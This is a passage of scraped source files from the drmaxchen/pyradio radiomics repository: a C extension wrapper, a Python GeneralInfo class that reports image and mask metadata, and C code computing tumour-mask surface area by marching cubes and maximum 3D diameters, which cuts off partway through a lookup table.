The isovalue is considered to be situated \"\n \"midway between a voxel that is part of the segmentation and a voxel that is not.\";\nstatic char diameter_docstring[] = \"Arguments: Mask, PixelSpacing, ROI size.\";\n\nstatic PyObject *cshape_calculate_surfacearea(PyObject *self, PyObject *args);\nstatic PyObject *cshape_calculate_diameter(PyObject *self, PyObject *args);\n\nint check_arrays(PyArrayObject *mask_arr, PyArrayObject *spacing_arr, int *size, int *strides);\n\nstatic PyMethodDef module_methods[] = {\n //{\"calculate_\", cmatrices_, METH_VARARGS, _docstring},\n { \"calculate_surfacearea\", cshape_calculate_surfacearea, METH_VARARGS, surface_docstring },\n { \"calculate_diameter\", cshape_calculate_diameter,METH_VARARGS, diameter_docstring},\n { NULL, NULL, 0, NULL }\n};\n\n#if PY_MAJOR_VERSION >= 3\n\nstatic struct PyModuleDef moduledef = {\n PyModuleDef_HEAD_INIT,\n \"_cshape\", /* m_name */\n module_docstring, /* m_doc */\n -1, /* m_size */\n module_methods, /* m_methods */\n NULL, /* m_reload */\n NULL, /* m_traverse */\n NULL, /* m_clear */\n NULL, /* m_free */\n};\n\n#endif\n\nstatic PyObject *\nmoduleinit(void)\n{\n PyObject *m;\n\n#if PY_MAJOR_VERSION >= 3\n m = PyModule_Create(&moduledef);\n#else\n m = Py_InitModule3(\"_cshape\",\n module_methods, module_docstring);\n#endif\n\n if (m == NULL)\n return NULL;\n\n return m;\n}\n\n#if PY_MAJOR_VERSION < 3\n PyMODINIT_FUNC\n init_cshape(void)\n {\n // Initialize numpy functionality\n import_array();\n\n moduleinit();\n }\n#else\n PyMODINIT_FUNC\n PyInit__cshape(void)\n {\n // Initialize numpy functionality\n import_array();\n\n return moduleinit();\n }\n#endif\n\nstatic PyObject *cshape_calculate_surfacearea(PyObject *self, PyObject *args)\n{\n PyObject *mask_obj, *spacing_obj;\n PyArrayObject *mask_arr, *spacing_arr;\n int size[3];\n int strides[3];\n char *mask;\n double *spacing;\n double SA;\n // Parse the input tuple\n if (!PyArg_ParseTuple(args, \"OO\", &mask_obj, &spacing_obj))\n return NULL;\n\n // Interpret the input as numpy arrays\n mask_arr = (PyArrayObject *)PyArray_FROM_OTF(mask_obj, NPY_BYTE, NPY_ARRAY_FORCECAST | NPY_ARRAY_UPDATEIFCOPY | NPY_ARRAY_IN_ARRAY);\n spacing_arr = (PyArrayObject *)PyArray_FROM_OTF(spacing_obj, NPY_DOUBLE, NPY_ARRAY_FORCECAST | NPY_ARRAY_UPDATEIFCOPY | NPY_ARRAY_IN_ARRAY);\n\n if (check_arrays(mask_arr, spacing_arr, size, strides) > 0) return NULL;\n\n // Get arrays in Ctype\n mask = (char *)PyArray_DATA(mask_arr);\n spacing = (double *)PyArray_DATA(spacing_arr);\n\n //Calculate Surface Area\n SA = calculate_surfacearea(mask, size, strides, spacing);\n\n // Clean up\n Py_XDECREF(mask_arr);\n Py_XDECREF(spacing_arr);\n\n if (SA < 0) // if SA < 0, an error has occurred\n {\n PyErr_SetString(PyExc_RuntimeError, \"Calculation of Surface Area Failed.\");\n return NULL;\n }\n\n return Py_BuildValue(\"f\", SA);\n}\n\nstatic PyObject *cshape_calculate_diameter(PyObject *self, PyObject *args)\n{\n PyObject *mask_obj, *spacing_obj;\n PyArrayObject *mask_arr, *spacing_arr;\n int Ns;\n int size[3];\n int strides[3];\n char *mask;\n double *spacing;\n double *diameters;\n PyObject *rslt;\n\n // Parse the input tuple\n if (!PyArg_ParseTuple(args, \"OOi\", &mask_obj, &spacing_obj, &Ns))\n return NULL;\n\n // Interpret the input as numpy arrays\n mask_arr = (PyArrayObject *)PyArray_FROM_OTF(mask_obj, NPY_BYTE, NPY_ARRAY_FORCECAST | NPY_ARRAY_UPDATEIFCOPY | NPY_ARRAY_IN_ARRAY);\n spacing_arr = (PyArrayObject *)PyArray_FROM_OTF(spacing_obj, NPY_DOUBLE, NPY_ARRAY_FORCECAST | NPY_ARRAY_UPDATEIFCOPY | 
NPY_ARRAY_IN_ARRAY);\n\n if (check_arrays(mask_arr, spacing_arr, size, strides) > 0) return NULL;\n\n // Get arrays in Ctype\n mask = (char *)PyArray_DATA(mask_arr);\n spacing = (double *)PyArray_DATA(spacing_arr);\n\n // Initialize output array (elements not set)\n diameters = (double *)calloc(4, sizeof(double));\n\n // Calculating Max 3D Diameter\n if (!calculate_diameter(mask, size, strides, spacing, Ns, diameters))\n {\n Py_XDECREF(mask_arr);\n Py_XDECREF(spacing_arr);\n free(diameters);\n PyErr_SetString(PyExc_RuntimeError, \"Calculation of maximum 3D diameter failed.\");\n return NULL;\n }\n\n rslt = Py_BuildValue(\"ffff\", diameters[0], diameters[1], diameters[2], diameters[3]);\n\n // Clean up\n Py_XDECREF(mask_arr);\n Py_XDECREF(spacing_arr);\n free(diameters);\n\n return rslt;\n}\n\nint check_arrays(PyArrayObject *mask_arr, PyArrayObject *spacing_arr, int *size, int *strides)\n{\n if (mask_arr == NULL || spacing_arr == NULL)\n {\n Py_XDECREF(mask_arr);\n Py_XDECREF(spacing_arr);\n PyErr_SetString(PyExc_RuntimeError, \"Error parsing array arguments.\");\n return 1;\n }\n\n if (PyArray_NDIM(mask_arr) != 3 || PyArray_NDIM(spacing_arr) != 1)\n {\n Py_XDECREF(mask_arr);\n Py_XDECREF(spacing_arr);\n PyErr_SetString(PyExc_RuntimeError, \"Expected a 3D array for mask, 1D for spacing.\");\n return 2;\n }\n\n if ( !PyArray_IS_C_CONTIGUOUS(mask_arr) || !PyArray_IS_C_CONTIGUOUS(spacing_arr))\n {\n Py_XDECREF(mask_arr);\n Py_XDECREF(spacing_arr);\n PyErr_SetString(PyExc_RuntimeError, \"Expecting input arrays to be C-contiguous.\");\n return 3;\n }\n\n if (PyArray_DIM(spacing_arr, 0) != 3)\n {\n Py_XDECREF(mask_arr);\n Py_XDECREF(spacing_arr);\n PyErr_SetString(PyExc_RuntimeError, \"Expecting spacing array to have shape (3,).\");\n return 4;\n }\n\n // Get sizes of the arrays\n size[2] = (int)PyArray_DIM(mask_arr, 2);\n size[1] = (int)PyArray_DIM(mask_arr, 1);\n size[0] = (int)PyArray_DIM(mask_arr, 0);\n\n strides[2] = (int)(PyArray_STRIDE(mask_arr, 2) / PyArray_ITEMSIZE(mask_arr));\n strides[1] = (int)(PyArray_STRIDE(mask_arr, 1) / PyArray_ITEMSIZE(mask_arr));\n strides[0] = (int)(PyArray_STRIDE(mask_arr, 0) / PyArray_ITEMSIZE(mask_arr));\n\n return 0;\n}\n" }, { "alpha_fraction": 0.6926302909851074, "alphanum_fraction": 0.6951767802238464, "avg_line_length": 31.25120735168457, "blob_id": "e75f68b7e461b1262c16629dad9c31f2997a73df", "content_id": "9e8dfdeca02f0ffce00a08d7c3cdb4d0c11d3c70", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6676, "license_type": "permissive", "max_line_length": 138, "num_lines": 207, "path": "/radiomics/generalinfo.py", "repo_name": "drmaxchen/pyradio", "src_encoding": "UTF-8", "text": "import collections\nimport logging\n\nimport numpy\nimport pywt\nimport SimpleITK as sitk\nimport six\n\nimport radiomics\n\n\nclass GeneralInfo():\n def __init__(self, imagePath, maskPath, resampledMask, settings, enabledImageTypes):\n self.logger = logging.getLogger(self.__module__)\n\n self.elements = self._getElementNames()\n\n if isinstance(imagePath, six.string_types):\n self.image = sitk.ReadImage(imagePath)\n elif isinstance(imagePath, sitk.Image):\n self.image = imagePath\n else:\n self.logger.warning('Error reading image Filepath or SimpleITK object')\n self.image = None\n\n if isinstance(maskPath, six.string_types):\n self.mask = sitk.ReadImage(maskPath)\n elif isinstance(maskPath, sitk.Image):\n self.mask = maskPath\n else:\n self.logger.warning('Error reading mask Filepath or SimpleITK object')\n 
self.mask = None\n\n self.resampledMask = resampledMask\n\n self._settings = settings\n self._enabledImageTypes = enabledImageTypes\n\n self.label = self._settings.get('label', 1)\n\n if resampledMask is not None:\n self.lssif = sitk.LabelShapeStatisticsImageFilter()\n self.lssif.Execute(resampledMask)\n else:\n self.lssif = None\n\n def _getElementNames(self):\n return [member[3: -5] for member in dir(self) if member.startswith('get') and member.endswith('Value')]\n\n def execute(self):\n \"\"\"\n Return a dictionary containing all general info items. Format is <info_item>:<value>, where the type\n of the value is preserved. For CSV format, this will result in conversion to string and quotes where necessary, for\n JSON, the values will be interpreted and stored as JSON strings.\n \"\"\"\n generalInfo = collections.OrderedDict()\n for el in self.elements:\n generalInfo[el] = getattr(self, 'get%sValue' % el)()\n return generalInfo\n\n def getBoundingBoxValue(self):\n \"\"\"\n Calculate and return the boundingbox extracted using the specified label.\n Elements 0, 1 and 2 are the x, y and z coordinates of the lower bound, respectively.\n Elements 3, 4 and 5 are the size of the bounding box in x, y and z direction, respectively.\n\n Values are based on the resampledMask.\n \"\"\"\n if self.lssif is not None:\n return self.lssif.GetBoundingBox(self.label)\n else:\n return None\n\n def getGeneralSettingsValue(self):\n \"\"\"\n Return a string representation of the general settings.\n Format is {<settings_name>:<value>, ...}.\n \"\"\"\n return self._settings\n\n def getImageHashValue(self):\n \"\"\"\n Returns the sha1 hash of the image. This enables checking whether two images are the same,\n regardless of the file location.\n\n If the reading of the image fails, an empty string is returned.\n \"\"\"\n if self.image is not None:\n return sitk.Hash(self.image)\n else:\n return None\n\n def getImageSpacingValue(self):\n \"\"\"\n Returns the original spacing (before any resampling) of the image.\n\n If the reading of the image fails, an empty string is returned.\n \"\"\"\n if self.image is not None:\n return self.image.GetSpacing()\n else:\n return None\n\n def getCenterOfMassIndexValue(self):\n \"\"\"\n Returns z, y and x coordinates of the center of mass of the ROI in terms of the image coordinate space (continuous index).\n\n Calculation is based on the original (non-resampled) mask.\n\n .. note::\n Because this represents the continuous index, the order of x, y and z is reversed, i.e. the first element is the z index, the second\n the y index and the last element is the x index.\n \"\"\"\n if self.mask is not None:\n maskArray = sitk.GetArrayFromImage(self.mask)\n maskCoordinates = numpy.array(numpy.where(maskArray == self.label))\n center_index = numpy.mean(maskCoordinates, axis=1)\n return tuple(center_index)\n else:\n return None\n\n def getCenterOfMassValue(self):\n \"\"\"\n Returns the real-world x, y and z coordinates of the center of mass of the ROI. 
This is the real-world transformation of\n :py:func:`~radiomics.generalinfo.getCenterOfMassIndexValue()`, taking into account the spacing, direction and origin of the mask.\n\n Calculation is based on the original (non-resampled) mask.\n \"\"\"\n if self.mask is not None:\n return self.mask.TransformContinuousIndexToPhysicalPoint(self.getCenterOfMassIndexValue())\n else:\n return None\n\n def getEnabledImageTypesValue(self):\n \"\"\"\n Return a string representation of the enabled image types and any custom settings for each image type.\n Format is {<imageType_name>:{<setting_name>:<value>, ...}, ...}.\n \"\"\"\n return self._enabledImageTypes\n\n def getMaskHashValue(self):\n \"\"\"\n Returns the sha1 hash of the mask. This enables checking whether two masks are the same,\n regardless of the file location.\n\n If the reading of the mask fails, an empty string is returned. Uses the original mask, specified in maskPath.\n \"\"\"\n if self.mask is not None:\n return sitk.Hash(self.mask)\n else:\n return None\n\n @classmethod\n def getVersionValue(self):\n \"\"\"\n Return the current version of this package.\n \"\"\"\n return radiomics.__version__\n\n @classmethod\n def getNumpyVersionValue(self):\n \"\"\"\n Return the current version of the numpy package, used for feature calculation.\n \"\"\"\n return numpy.__version__\n\n @classmethod\n def getSimpleITKVersionValue(self):\n \"\"\"\n Return the current version of the SimpleITK package, used for image processing.\n \"\"\"\n return sitk.Version().VersionString()\n\n @classmethod\n def getPyWaveletVersionValue(self):\n \"\"\"\n Return the current version of the PyWavelet package, used to apply the wavelet filter.\n \"\"\"\n return pywt.__version__\n\n def getVolumeNumValue(self):\n \"\"\"\n Calculate and return the number of zones within the mask for the specified label.\n A zone is defined as a group of connected neighbours that are segmented with the specified label, and a voxel is\n considered a neighbour using 26-connectedness for 3D and 8-connectedness for 2D.\n\n Values are based on the resampledMask.\n \"\"\"\n if self.resampledMask is not None:\n labelMap = (self.resampledMask == self.label)\n ccif = sitk.ConnectedComponentImageFilter()\n ccif.FullyConnectedOn()\n ccif.Execute(labelMap)\n return ccif.GetObjectCount()\n else:\n return None\n\n def getVoxelNumValue(self):\n \"\"\"\n Calculate and return the number of voxels that have been segmented using the specified label.\n\n Values are based on the resampledMask.\n \"\"\"\n if self.lssif is not None:\n return self.lssif.GetNumberOfPixels(self.label)\n else:\n return None\n" }, { "alpha_fraction": 0.2751407325267792, "alphanum_fraction": 0.43696877360343933, "avg_line_length": 45.575836181640625, "blob_id": "7f37142b6f0ad23e2a4a58260e4a4ef293fafa4b", "content_id": "cf7231332f8eba03f0621ff67bed8c3ec8391a7a", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 18118, "license_type": "permissive", "max_line_length": 140, "num_lines": 389, "path": "/radiomics/src/cshape.c", "repo_name": "drmaxchen/pyradio", "src_encoding": "UTF-8", "text": "#include \"cshape.h\"\n#include <math.h>\n#include <stdlib.h>\n\nint *generate_angles(int *size, int *strides, int *a_strides, int *Na, int *mDim);\n\n// Declare the look-up tables, these are filled at the bottom of this code file.\nstatic const int gridAngles[8][3];\n//static const int edgeTable[128]; // Not needed in this implementation\nstatic const int triTable[128][16];\nstatic const 
double vertList[12][3];\n\ndouble calculate_surfacearea(char *mask, int *size, int *strides, double *spacing)\n{\n int iz, iy, ix, i, t, d; // iterator indices\n unsigned char cube_idx; // cube identifier, 8 bits signifying which corners of the cube belong to the segmentation\n int a_idx; // Angle index (8 'angles', one pointing to each corner of the marching cube\n double sum;\n double surfaceArea = 0; // Total surface area\n double a[3], b[3], c[3]; // 2 points of the triangle, relative to the third, and the cross product vector\n\n // Iterate over all voxels, do not include last voxels in the three dimensions, as the cube includes voxels at pos +1\n for (iz = 0; iz < (size[0] - 1); iz++)\n {\n for (iy = 0; iy < (size[1] - 1); iy++)\n {\n for (ix = 0; ix < (size[2] - 1); ix++)\n {\n // Get current cube_idx by analyzing each point of the current cube\n cube_idx = 0;\n for (a_idx = 0; a_idx < 8; a_idx++)\n {\n i = (iz + gridAngles[a_idx][0]) * strides[0] +\n (iy + gridAngles[a_idx][1]) * strides[1] +\n (ix + gridAngles[a_idx][2]) * strides[2];\n\n if (mask[i]) cube_idx |= (1 << a_idx);\n }\n\n // Isosurface is symmetrical around the midpoint, flip the number if > 128\n // This enables look-up tables to be 1/2 the size.\n if (cube_idx & 0x80) cube_idx ^= 0xff;\n\n // Exlcude cubes entirely outside or inside the segmentation. Also exclude potential invalid values (>= 128).\n if (cube_idx > 0 && cube_idx < 128)\n {\n t = 0;\n while (triTable[cube_idx][t*3] >= 0) // Exit loop when no more triangles are present (element at index = -1)\n {\n for (d = 0; d < 3; d++)\n {\n a[d] = vertList[triTable[cube_idx][t*3 + 1]][d] - vertList[triTable[cube_idx][t*3]][d];\n b[d] = vertList[triTable[cube_idx][t*3 + 2]][d] - vertList[triTable[cube_idx][t*3]][d];\n\n // Factor in the spacing\n a[d] *= spacing[d];\n b[d] *= spacing[d];\n }\n\n // Compute the cross-product\n c[0] = (a[1] * b[2]) - (b[1] * a[2]);\n c[1] = (a[2] * b[0]) - (b[2] * a[0]);\n c[2] = (a[0] * b[1]) - (b[0] * a[1]);\n\n // Get the square\n c[0] = c[0] * c[0];\n c[1] = c[1] * c[1];\n c[2] = c[2] * c[2];\n\n // Compute the surface, which is equal to 1/2 magnitude of the cross product, where\n // The magnitude is obtained by calculating the euclidean distance between (0, 0, 0)\n // and the location of c\n sum = c[0] + c[1] + c[2];\n sum = sqrt(sum);\n sum = 0.5 * sum;\n surfaceArea += sum;\n t++;\n }\n }\n }\n }\n }\n return surfaceArea;\n}\n\nint calculate_diameter(char *mask, int *size, int *strides, double *spacing, int Ns, double *diameters)\n{\n int iz, iy, ix, i, j;\n int a_idx, d_idx;\n int Na, mDim;\n int *angles;\n int a_strides[3];\n\n int *stack;\n int stack_top = -1;\n\n int idx, jz, jy, jx;\n double dz, dy, dx;\n double distance;\n\n angles = generate_angles(size, strides, a_strides, &Na, &mDim);\n stack = (int *)calloc(Ns, sizeof(int));\n\n // First, get all the voxels on the border\n i = 0;\n // Iterate over all voxels in a row - column - slice order\n // As the mask is padded with 0's, no voxels on the edge of the image are part of the mask, so skip those...\n for (iz = 1; iz < size[0] - 1; iz++)\n {\n for (iy = 1; iy < size[1] - 1; iy++)\n {\n for (ix = 1; ix < size[2] - 1; ix++)\n {\n i = iz * strides[0] +\n iy * strides[1] +\n ix * strides[2];\n if (mask[i])\n {\n for (a_idx = 0; a_idx < Na; a_idx++)\n {\n j = i;\n for (d_idx = 0; d_idx < mDim; d_idx++)\n {\n j += angles[a_idx * mDim + d_idx] * a_strides[d_idx];\n }\n\n if (mask[j] == 0)\n {\n // neighbour not part of ROI, i.e. 
'i' is border voxel\n if (stack_top >= Ns) return 0; // index out of bounds\n stack[++stack_top] = i;\n break;\n }\n }\n }\n }\n }\n\t}\n stack_top++; // increment by 1, so when the first item is popped, it is the last item entered\n\n\tfree(angles);\n\n diameters[0] = 0;\n diameters[1] = 0;\n diameters[2] = 0;\n diameters[3] = 0;\n\n while (stack_top > 0)\n {\n // pop the last item from the stack, this prevents double processing and comparing the same voxels\n i = stack[--stack_top];\n iz = (i / strides[0]);\n iy = (i % strides[0]) / strides[1];\n ix = (i % strides[0]) % strides[1];\n for (idx = 0; idx < stack_top; idx++) // calculate distance to all other voxels\n {\n j = stack[idx];\n\t jz = (j / strides[0]);\n jy = (j % strides[0]) / strides[1];\n jx = (j % strides[0]) % strides[1];\n\n dz = (double)(iz - jz) * spacing[0];\n dy = (double)(iy - jy) * spacing[1];\n dx = (double)(ix - jx) * spacing[2];\n\n dz *= dz;\n dy *= dy;\n dx *= dx;\n\n distance = dz + dy + dx;\n if (iz == jz && distance > diameters[0]) diameters[0] = distance;\n if (iy == jy && distance > diameters[1]) diameters[1] = distance;\n if (ix == jx && distance > diameters[2]) diameters[2] = distance;\n if (distance > diameters[3]) diameters[3] = distance;\n }\n }\n free(stack);\n\n diameters[0] = sqrt(diameters[0]);\n diameters[1] = sqrt(diameters[1]);\n diameters[2] = sqrt(diameters[2]);\n diameters[3] = sqrt(diameters[3]);\n\n return 1;\n}\n\nint *generate_angles(int *size, int *strides, int *a_strides, int *Na, int *mDim)\n{\n static int *angles; // return value, declare static so it can be returned\n\n int offsets[3] = {-1, 0, 1}; // distance 1, both directions\n int a_idx, d_idx, a_offset, stride;\n\n // First, determine how many 'moving' dimensions there are, this determines the number of distinct angles to generate\n // Na = 3 ** NDIM(Size > 3) - 1, i.e. each dimension triples the number of angles, -1 to exclude (0, 0, 0)\n *Na = 1;\n *mDim = 0;\n for (d_idx = 0; d_idx < 3; d_idx++) // assume mask is 3D\n {\n if (size[d_idx] > 3) // mask is padded with 0's in all directions, i.e. bounding box size = size - 2\n {\n // Dimension is a moving dimension\n a_strides[*mDim] = strides[d_idx];\n *Na *= 3;\n (*mDim)++;\n }\n }\n (*Na)--; // Don't generate angle for (0, 0, 0)\n\n // Initialize array to hold the angles\n angles = (int *)calloc(*Na * *mDim, sizeof(int));\n\n // Fill the angles array\n stride = 1;\n for (d_idx = 0; d_idx < *mDim; d_idx++) // Iterate over all moving dimensions\n {\n a_offset = 0;\n for (a_idx = 0; a_idx < *Na; a_idx++)\n {\n if (a_idx == *Na / 2) a_offset = 1; // Skip (0, 0, 0) angle\n\n angles[a_idx * *mDim + d_idx] = offsets[((a_idx + a_offset) / stride) % 3];\n }\n stride *= 3; // For next dimension, multiply stride by 3 (length offsets) --> {1, 3, 9, ...}\n }\n return angles;\n}\n\n// gridAngles define the 8 corners of the marching cube, relative to the origin of the cube\nstatic const int gridAngles[8][3] = { { 0, 0, 0 }, { 0, 0, 1 }, { 0, 1, 1 }, {0, 1, 0}, { 1, 0, 0 }, {1, 0, 1 }, { 1, 1, 1 }, { 1, 1, 0 } };\n\n// edgeTable defines which edges contain intersection points, for which the exact intersection point has to be\n// interpolated. 
However, as the intersection point is always 0.5, this can be defined beforehand, and this table is not\n// needed\n/*static const int edgeTable[128] = {\n 0x000, 0x109, 0x203, 0x30a, 0x406, 0x50f, 0x605, 0x70c, 0x80c, 0x905, 0xa0f, 0xb06, 0xc0a, 0xd03, 0xe09, 0xf00,\n 0x190, 0x099, 0x393, 0x29a, 0x596, 0x49f, 0x795, 0x69c, 0x99c, 0x895, 0xb9f, 0xa96, 0xd9a, 0xc93, 0xf99, 0xe90,\n 0x230, 0x339, 0x033, 0x13a, 0x636, 0x73f, 0x435, 0x53c, 0xa3c, 0xb35, 0x83f, 0x936, 0xe3a, 0xf33, 0xc39, 0xd30,\n 0x3a0, 0x2a9, 0x1a3, 0x0aa, 0x7a6, 0x6af, 0x5a5, 0x4ac, 0xbac, 0xaa5, 0x9af, 0x8a6, 0xfaa, 0xea3, 0xda9, 0xca0,\n 0x460, 0x569, 0x663, 0x76a, 0x066, 0x16f, 0x265, 0x36c, 0xc6c, 0xd65, 0xe6f, 0xf66, 0x86a, 0x963, 0xa69, 0xb60,\n 0x5f0, 0x4f9, 0x7f3, 0x6fa, 0x1f6, 0x0ff, 0x3f5, 0x2fc, 0xdfc, 0xcf5, 0xfff, 0xef6, 0x9fa, 0x8f3, 0xbf9, 0xaf0,\n 0x650, 0x759, 0x453, 0x55a, 0x256, 0x35f, 0x055, 0x15c, 0xe5c, 0xf55, 0xc5f, 0xd56, 0xa5a, 0xb53, 0x859, 0x950,\n 0x7c0, 0x6c9, 0x5c3, 0x4ca, 0x3c6, 0x2cf, 0x1c5, 0x0cc, 0xfcc, 0xec5, 0xdcf, 0xcc6, 0xbca, 0xac3, 0x9c9, 0x8c0\n};*/\n\n// triTable defines which triangles (defined by their points as defined in vertList) are present in the cube.\n// The first dimension indicates the specific cube to look up, the second dimension contains sets of 3 points (1 for\n// each triangle), with the elements set to -1 after all triangles have been defined (max. no of triangles: 5)\nstatic const int triTable[128][16] = {\n { -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 8, 3, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 1, 9, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 8, 3, 9, 8, 1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 2, 10, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 8, 3, 1, 2, 10, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 2, 10, 0, 2, 9, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 2, 8, 3, 2, 10, 8, 10, 9, 8, -1, -1, -1, -1, -1, -1, -1 },\n { 3, 11, 2, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 11, 2, 8, 11, 0, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 9, 0, 2, 3, 11, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 11, 2, 1, 9, 11, 9, 8, 11, -1, -1, -1, -1, -1, -1, -1 },\n { 3, 10, 1, 11, 10, 3, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 10, 1, 0, 8, 10, 8, 11, 10, -1, -1, -1, -1, -1, -1, -1 },\n { 3, 9, 0, 3, 11, 9, 11, 10, 9, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 8, 10, 10, 8, 11, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 4, 7, 8, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 4, 3, 0, 7, 3, 4, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 1, 9, 8, 4, 7, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 4, 1, 9, 4, 7, 1, 7, 3, 1, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 2, 10, 8, 4, 7, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 3, 4, 7, 3, 0, 4, 1, 2, 10, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 2, 10, 9, 0, 2, 8, 4, 7, -1, -1, -1, -1, -1, -1, -1 },\n { 2, 10, 9, 2, 9, 7, 2, 7, 3, 7, 9, 4, -1, -1, -1, -1 },\n { 8, 4, 7, 3, 11, 2, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 11, 4, 7, 11, 2, 4, 2, 0, 4, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 0, 1, 8, 4, 7, 2, 3, 11, -1, -1, -1, -1, -1, -1, -1 },\n { 4, 7, 11, 9, 4, 11, 9, 11, 2, 9, 2, 1, -1, -1, -1, -1 },\n { 3, 10, 1, 3, 11, 10, 7, 8, 4, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 11, 10, 1, 4, 11, 1, 0, 4, 7, 11, 4, -1, -1, -1, -1 },\n { 4, 7, 8, 9, 0, 11, 9, 11, 10, 11, 0, 3, -1, -1, -1, -1 },\n { 4, 7, 11, 4, 11, 9, 9, 11, 10, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 5, 4, -1, -1, -1, -1, -1, -1, 
-1, -1, -1, -1, -1, -1, -1 },\n { 9, 5, 4, 0, 8, 3, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 5, 4, 1, 5, 0, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 8, 5, 4, 8, 3, 5, 3, 1, 5, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 2, 10, 9, 5, 4, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 3, 0, 8, 1, 2, 10, 4, 9, 5, -1, -1, -1, -1, -1, -1, -1 },\n { 5, 2, 10, 5, 4, 2, 4, 0, 2, -1, -1, -1, -1, -1, -1, -1 },\n { 2, 10, 5, 3, 2, 5, 3, 5, 4, 3, 4, 8, -1, -1, -1, -1 },\n { 9, 5, 4, 2, 3, 11, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 11, 2, 0, 8, 11, 4, 9, 5, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 5, 4, 0, 1, 5, 2, 3, 11, -1, -1, -1, -1, -1, -1, -1 },\n { 2, 1, 5, 2, 5, 8, 2, 8, 11, 4, 8, 5, -1, -1, -1, -1 },\n { 10, 3, 11, 10, 1, 3, 9, 5, 4, -1, -1, -1, -1, -1, -1, -1 },\n { 4, 9, 5, 0, 8, 1, 8, 10, 1, 8, 11, 10, -1, -1, -1, -1 },\n { 5, 4, 0, 5, 0, 11, 5, 11, 10, 11, 0, 3, -1, -1, -1, -1 },\n { 5, 4, 8, 5, 8, 10, 10, 8, 11, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 7, 8, 5, 7, 9, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 3, 0, 9, 5, 3, 5, 7, 3, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 7, 8, 0, 1, 7, 1, 5, 7, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 5, 3, 3, 5, 7, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 7, 8, 9, 5, 7, 10, 1, 2, -1, -1, -1, -1, -1, -1, -1 },\n { 10, 1, 2, 9, 5, 0, 5, 3, 0, 5, 7, 3, -1, -1, -1, -1 },\n { 8, 0, 2, 8, 2, 5, 8, 5, 7, 10, 5, 2, -1, -1, -1, -1 },\n { 2, 10, 5, 2, 5, 3, 3, 5, 7, -1, -1, -1, -1, -1, -1, -1 },\n { 7, 9, 5, 7, 8, 9, 3, 11, 2, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 5, 7, 9, 7, 2, 9, 2, 0, 2, 7, 11, -1, -1, -1, -1 },\n { 2, 3, 11, 0, 1, 8, 1, 7, 8, 1, 5, 7, -1, -1, -1, -1 },\n { 11, 2, 1, 11, 1, 7, 7, 1, 5, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 5, 8, 8, 5, 7, 10, 1, 3, 10, 3, 11, -1, -1, -1, -1 },\n { 5, 7, 0, 5, 0, 9, 7, 11, 0, 1, 0, 10, 11, 10, 0, -1 },\n { 11, 10, 0, 11, 0, 3, 10, 5, 0, 8, 0, 7, 5, 7, 0, -1 },\n { 11, 10, 5, 7, 11, 5, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 10, 6, 5, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 8, 3, 5, 10, 6, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 0, 1, 5, 10, 6, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 8, 3, 1, 9, 8, 5, 10, 6, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 6, 5, 2, 6, 1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 6, 5, 1, 2, 6, 3, 0, 8, -1, -1, -1, -1, -1, -1, -1 },\n { 9, 6, 5, 9, 0, 6, 0, 2, 6, -1, -1, -1, -1, -1, -1, -1 },\n { 5, 9, 8, 5, 8, 2, 5, 2, 6, 3, 2, 8, -1, -1, -1, -1 },\n { 2, 3, 11, 10, 6, 5, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 11, 0, 8, 11, 2, 0, 10, 6, 5, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 1, 9, 2, 3, 11, 5, 10, 6, -1, -1, -1, -1, -1, -1, -1 },\n { 5, 10, 6, 1, 9, 2, 9, 11, 2, 9, 8, 11, -1, -1, -1, -1 },\n { 6, 3, 11, 6, 5, 